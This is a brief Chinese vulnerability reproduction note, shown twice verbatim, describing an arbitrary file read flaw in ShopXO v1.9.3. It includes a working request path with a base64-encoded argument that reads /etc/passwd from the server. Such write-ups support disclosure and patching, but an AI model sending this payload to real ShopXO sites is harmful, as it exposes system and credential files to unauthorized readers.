一、漏洞概述
ShopXO是一套开源的企业级开源电子商务系统。ShopXO存在任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息。
二、影响范围
ShopXO v1.9.3
三、访问页面
四、漏洞复现
1、访问payload,其中L2V0Yy9wYXNzd2Q=是/etc/passwd的base64编码。
/public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q=
一、漏洞概述
ShopXO是一套开源的企业级开源电子商务系统。ShopXO存在任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息。
二、影响范围
ShopXO v1.9.3
三、访问页面
四、漏洞复现
1、访问payload,其中L2V0Yy9wYXNzd2Q=是/etc/passwd的base64编码。
/public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q=